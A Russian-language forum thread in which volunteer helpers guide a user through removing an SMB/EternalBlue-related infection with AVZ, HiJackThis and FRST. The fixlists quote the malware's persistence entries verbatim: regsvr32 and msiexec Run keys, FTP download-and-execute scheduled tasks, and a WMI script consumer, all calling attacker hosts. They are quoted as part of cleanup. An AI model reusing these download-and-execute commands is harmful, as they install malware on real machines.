SMB:cve 2017 0144 - аваст ругается на вот это. Пробовал ставить Malwarebyte animalware. Как то не помогло. Что делать?
Printable View
SMB:cve 2017 0144 - аваст ругается на вот это. Пробовал ставить Malwarebyte animalware. Как то не помогло. Что делать?
Уважаемый(ая) [B]ponchuk21[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Здравствуйте,
Удалите Driver Booster через установку программ в панели управления.
Сообщите, что из следующего вам известно?
[CODE]
O4 - MSConfig\startupreg: electron.app.Untapped.gg Companion [command] = C:\Users\Ivan\AppData\Local\Programs\untapped-companion\Untapped.gg Companion.exe --autostart (HKCU) (2019/05/05)
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14443 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14444 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 21 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 2222 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 3333 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 4444 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 5555 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 6666 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 7777 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8443 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8888 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9000 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9999 TCP) (mirrored) - Action: Block[/CODE]
AVZ [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]выполнить следующий скрипт[/URL].
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
[CODE]
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('D:\PHOTOC~1\ncontext.dll','');
QuarantineFile('C:\Users\Ivan\AppData\Local\Programs\untapped-companion\Untapped.gg','');
DeleteFile('C:\Windows\system32\Tasks\Driver Booster SkipUAC (иваааааан)','64');
DeleteFile('C:\Windows\system32\Tasks\Driver Booster Scheduler','64');
BC_ImportQuarantineList;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
[/CODE]
После выполнения скрипта компьютер перезагрузится.
После перезагрузки:
- Выполните в AVZ:
[CODE]
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
[/CODE]
Файл quarantine.zip из папки AVZ загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
- Подготовьте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] и приложите его в теме.
готово. Простите что так долго !
По вопросу что мне из того известно - Untapped.gg кажется ставил год назад +- для игры MTG Arena. Вроде никак себя не проявлял. Остальное хз, не разбираюсь в этом...
Если правила не сами устанавливали, то профиксите их.
HiJackThis (из каталога [B]autologger[/B])[URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]профиксить[/URL]
[B]Важно[/B]: необходимо отметить и профиксить [B]только[/B] то, что указано ниже.
[CODE]
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14443 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14444 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 21 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 2222 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 3333 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 4444 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 5555 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 6666 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 7777 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8443 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8888 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9000 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9999 TCP) (mirrored) - Action: Block[/CODE]
[url=https://virusinfo.info/showthread.php?t=218752&p=1480599&viewfull=1#post1480599]Удалите в AdwCleaner[/url] всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
готово
- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]https://i.corovin.info/FRST_Icon.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"SigCheckExt"[/i].
[img]https://i.corovin.info/FRST.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
Готово
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.1226bye.xyz:280/helloworld.msi /q <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {20F445D9-3A84-4234-8292-388154AB791D} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {51929E0F-76B1-4970-9854-DEDD52B5C86C} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {5B535D46-E651-4D5F-872A-E23346511362} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {ABCEBEB4-E0EE-447C-9FAA-B2839E16CCC6} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {C5D784ED-7AE6-4A78-B7C2-78609611CBB2} - \Driver Booster SkipUAC (иваааааан) -> No File <==== ATTENTION
NETSVC: Ms183512EEApp -> no filepath.
NETSVC: Ms183512EEAppA -> no filepath.
NETSVC: Ms183512EEAppBak -> no filepath.
NETSVC: Ms183512EEAppB -> no filepath.
2019-10-05 12:23 - 2019-10-10 08:39 - 000000080 _____ C:\Windows\system32\s
2019-10-05 12:23 - 2019-10-10 08:39 - 000000078 _____ C:\Windows\system32\ps
2019-10-05 12:23 - 2019-10-10 08:39 - 000000076 _____ C:\Windows\system32\p
2019-10-05 11:27 - 2019-10-10 18:00 - 000003518 _____ C:\Windows\system32\Tasks\Mysa
2019-10-05 11:27 - 2019-10-10 18:00 - 000003504 _____ C:\Windows\system32\Tasks\Mysa3
2019-10-05 11:27 - 2019-10-10 18:00 - 000003424 _____ C:\Windows\system32\Tasks\Mysa2
2019-10-05 11:27 - 2019-10-10 18:00 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2019-10-05 11:27 - 2019-10-05 11:27 - 000000067 _____ C:\Program Files\Common Files\xpdown.dat
2019-10-05 11:27 - 2019-10-05 11:27 - 000000005 _____ C:\Windows\system32\1.txt
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\winsps.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\taskmgr.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\SysWOW64\csrs.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\svchost.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\mask.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\lsass.exe
File: C:\Windows\Install.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Users\Все пользователи\svhost.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\ProgramData\svhost.exe
2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\xx.txt
2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\SysWOW64\xx.txt
2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\SysWOW64\xs.ini
2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\ma.bak
2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\In.bak
2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\ex.xx2s
2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\13.txt
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D () C:\ProgramData\svhost.exe
2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D () C:\Users\Все пользователи\svhost.exe
2019-10-05 11:27 - 2019-10-05 11:27 - 000000067 _____ () C:\Program Files\Common Files\xpdown.dat
File: C:\Windows\SysWOW64\lsprst7.dll
File: C:\Windows\SysWOW64\sysprs7.dll
ContextMenuHandlers1: [PhotoConverter7_std] -> [CC]{0C83C06D-41F5-4666-B1C2-0923EA75EB10} => -> No File
ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers4: [PhotoConverter7_std] -> [CC]{0C83C06D-41F5-4666-B1C2-0923EA75EB10} => -> No File
ContextMenuHandlers6: [PhotoConverter7_std] -> [CC]{0C83C06D-41F5-4666-B1C2-0923EA75EB10} => -> No File
ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers6: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm2_filter::[Query => select * from __timerevent where timerid="fuckyoumm2_itimer"] <==== ATTENTION
WMI:subscription\ActiveScriptEventConsumer->fuckyoumm2_consumer::[ScriptText => var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f (the data entry has 1430 more characters).] <==== ATTENTION
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dump_183512EE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms183512EEAppB => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_183512EE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms183512EEAppB => ""="Service"
Reboot:
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
- Покажите лог [URL="http://media.kaspersky.com/utilities/VirusUtilities/RU/tdsskiller.exe"]TDSSKiller[/URL]
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)
Готово!
Могли бы каталог C:\FRST\Quarantine заархивировать с паролем virus и загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
Скачайте программу [url="https://yadi.sk/d/6A65LkI1WEuqC"]Universal Virus Sniffer[/url] и [url="http://virusinfo.info/showthread.php?t=121767"]сделайте полный образ автозапуска uVS[/url].
все готово, но архив не влазит. Буквально 70 кб
не влезает архив
На облако/файлообменник и ссылку в тему.
[url]https://drive.google.com/file/d/19oc0Bx6G0iNgYWwe4uctGTKnW5Pr7s4f/view[/url]
Не возможно скачать, требует авторизацию, могли бы разрешить скачивание для все?
прошу прощения, попробуйте теперь. [url]https://drive.google.com/file/d/19oc0Bx6G0iNgYWwe4uctGTKnW5Pr7s4f/view?usp=sharing[/url]
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"fuckyoumm2_filter\":: <==== ATTENTION
Reboot:
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
Приложите пожалуйста следующий новый лог:
- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]https://i.corovin.info/FRST_Icon.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"SigCheckExt"[/i].
[img]https://i.corovin.info/FRST.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
готово
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
File: C:\Windows\System32\Drivers\ax8x0k1h.sys
File: C:\Windows\Install.exe
Folder: C:\ProgramData\WmiAppSrv
Folder: C:\ProgramData\Natioanl
Folder: C:\ProgramData\reaConverter7
File: C:\Windows\SysWOW64\lsprst7.dll
File: C:\Windows\SysWOW64\sysprs7.dll
Reboot:
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
готово
[LIST][*] Закройте и сохраните все открытые приложения.[*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
File: C:\ProgramData\WmiAppSrv\svchost.exe
File: C:\ProgramData\Natioanl\svchostr.exe
Zip: C:\ProgramData\Natioanl\svchostr.exe;C:\ProgramData\WmiAppSrv\svchost.exe;C:\Windows\SysWOW64\lsprst7.dll;C:\Windows\SysWOW64\sysprs7.dll
C:\ProgramData\WmiAppSrv\svchost.exe
C:\ProgramData\Natioanl\svchostr.exe
End::
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер возможно будет [b]перезагружен[/b].[/LIST]
На рабочем столе образуется карантин вида [B]<date>.zip[/B] загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.
готово
- Покажите лог [URL="http://media.kaspersky.com/utilities/VirusUtilities/RU/tdsskiller.exe"]TDSSKiller[/URL]
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)
P.S. самостоятельно пожалуйста ничего не удаляйте в случае нахождения чего либо.
=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
[LIST][*]=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: [B]3[/B][*]=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: [B]3[/B][*]=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=
=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB =E2 =EA=E0=F0=E0=ED=F2=E8=ED=E0=F5 =ED=
=E5 =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB[/LIST]
готово